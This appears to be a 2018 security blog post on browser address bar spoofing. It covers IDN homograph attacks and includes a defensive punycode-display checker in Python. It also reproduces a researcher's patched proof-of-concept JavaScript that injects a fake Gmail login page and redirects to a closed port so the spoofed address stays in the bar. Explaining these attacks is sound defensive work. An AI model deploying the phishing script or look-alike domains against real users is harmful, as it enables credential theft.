Dec 2, 2018

Web Browser Address Bar Spoofing

According to Google, the address bar is the most important security indicator.

The Google security team stated that the address bar is the most important security indicator in modern browsers. This part of the browser supplies both the true identity of the website and verification that you are on the right website.

Eric Lawrence, the author of the HTTP debugging proxy Fiddler, has written about this feature on his personal blog. In his article, he explained why web content must never be able to control anything above the web page window, a boundary sometimes referred to as the Line of Death, and what problems arise when that boundary is not respected. Despite his efforts to raise awareness, two address bar spoofing incidents took place the same year the blog post was published.

Homograph Vulnerability

One of the address bar spoofing incidents was the Homograph vulnerability disclosed in April 2017. Using Internationalized Domain Names (IDN), which allow domain names to be written in non-ASCII scripts, attackers imitate legitimate domains with characters from other alphabets that look the same as Latin letters, in order to trick users. This is called a Homograph attack.

For example, the address xn--80ak6aa92e.com is displayed as “аррӏе.com” because of IDN, which is virtually indistinguishable from “apple.com,” even though these are entirely different letters that just happen to look alike. Don’t believe us?

  • Copy this а here
  • Paste it into your browser bar, and press Return
  • Did you receive search results for the letter ‘a’ of the Latin alphabet or the Cyrillic script?

However, browser developers took precautions shortly after the discovery of the vulnerability by releasing security patches that prevented this confusing behavior. One tactic was to display such an IDN address in its ASCII (punycode) form in the address bar, which exposes the look-alike domain for what it is.
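As an added example in the spirit of that tactic (this is not code from the original post or from any browser vendor), the Python below decodes the punycode form of a hostname, flags a label that mixes scripts or consists entirely of Cyrillic look-alikes of Latin letters, and in that case falls back to showing the ASCII form. The confusables table is a constructed subset for illustration.

```python
import unicodedata
from typing import Optional, Tuple

# Constructed subset of the Unicode confusables data: Cyrillic letters that
# render like Latin letters in common fonts (a real check would load the full list).
CYRILLIC_TO_LATIN = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u04cf": "l", "\u0456": "i", "\u0458": "j",
    "\u0455": "s", "\u04bb": "h", "\u0501": "d", "\u051b": "q", "\u051d": "w",
}

def to_unicode(host: str) -> str:
    """Decode an ASCII (xn--) hostname to its Unicode form."""
    return host.encode("ascii").decode("idna")

def to_ascii(host: str) -> str:
    """Encode a Unicode hostname to its ASCII punycode form."""
    return host.encode("idna").decode("ascii")

def script_of(ch: str) -> str:
    """Script of a letter, taken from the first word of its Unicode name (LATIN, CYRILLIC, ...)."""
    return unicodedata.name(ch, "UNKNOWN").split()[0]

def skeleton(label: str) -> str:
    """Replace confusable Cyrillic letters with the Latin letters they resemble."""
    return "".join(CYRILLIC_TO_LATIN.get(ch, ch) for ch in label)

def label_risk(label: str) -> Optional[str]:
    """Reason a label could impersonate a Latin-script domain, or None if it looks honest."""
    scripts = {script_of(ch) for ch in label if ch.isalpha()}
    if len(scripts) > 1:
        return "mixed-script"             # e.g. Latin letters plus one Cyrillic 'а'
    if scripts == {"CYRILLIC"} and skeleton(label).isascii():
        return "whole-script-confusable"  # every letter has a Latin look-alike
    return None

def display_form(host: str) -> Tuple[str, Optional[str]]:
    """Address-bar policy: show the Unicode name only when no label is suspicious;
    otherwise show the punycode form and report why."""
    ascii_host = host if host.isascii() else to_ascii(host)
    unicode_host = to_unicode(ascii_host)
    for label in unicode_host.split("."):
        reason = label_risk(label)
        if reason:
            return ascii_host, reason
    return unicode_host, None

if __name__ == "__main__":
    for h in ("xn--80ak6aa92e.com", "xn--bcher-kva.ch"):
        print(h, "->", display_form(h))
```

A genuinely Cyrillic domain (one whose letters have no Latin look-alikes) still displays in Unicode, while the page's xn--80ak6aa92e.com example is shown as punycode.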

Address Bar Spoofing in Microsoft Edge and Safari

The second address bar spoofing incident was discovered by Pakistani researcher Rafay Baloch, who lectures at various conferences, such as Blackhat, on his research about browser security. The address spoofing technique he found affected Microsoft Edge and Safari browsers.

  • While a website was redirecting its visitor to another site on a closed port, the attacker could intervene and change the content of the current page however they liked.
  • Because the URL bar already showed the address of the domain with the closed port, users were led to believe that they were browsing a legitimate site instead of an attacker-controlled one and were convinced to enter their credentials.
  • In his proof-of-concept, before redirecting the user to the site with the closed port, Baloch decoded a base64-encoded copy of the Gmail login page and added it to the DOM. The address in the URL bar (http://gmail.com:8080) and the phishing page therefore looked very convincing. Baloch kept the spoofed address stable by using the setInterval() function, which tried to redirect the user every 100 seconds.

The Code Used to Spoof the Web Browser Address Bar

Baloch used the following code for the exploit described above:

<script>
function spoof()
{
    // Base64 encoded copy of the Gmail login page (truncated here)
    var gmail = 'PCFET0NC8+KArOK.........ZHk+PC9odG1sPg==';
    // Replace the current page body with the decoded phishing page
    x = document.body.innerHTML = atob(gmail);
    document.write("<title>Gmail</title>");
    document.write("x");
    // Navigate to a closed port; the address bar shows the new URL before the connection fails
    window.location.assign("https://www.Gmail.com:8080");
}
// Pass the function itself (not its return value) so it is re-run every 100 seconds
setInterval(spoof, 100000);
</script>

The proof-of-concept above is the one that worked on Microsoft Edge. The latest security update for Microsoft Edge fixed the vulnerability, and Baloch’s tweet announced that Apple also fixed it with the release of Safari 12. You can read more about his research in his blog post, “Apple Safari and Microsoft Edge Browser Address Bar Spoofing – Writeup”.

Conclusion

The address bar is the main component web browsers use to navigate the Internet: users type the address of the website they wish to visit, and security-conscious users watch how that address changes as the page loads. Attackers are aware of this and therefore invent clever ways to deceive the user, such as Homograph attacks and the vulnerabilities found by Rafay Baloch. Keeping all software, especially web browsers, up to date is crucial to help prevent similar attacks.
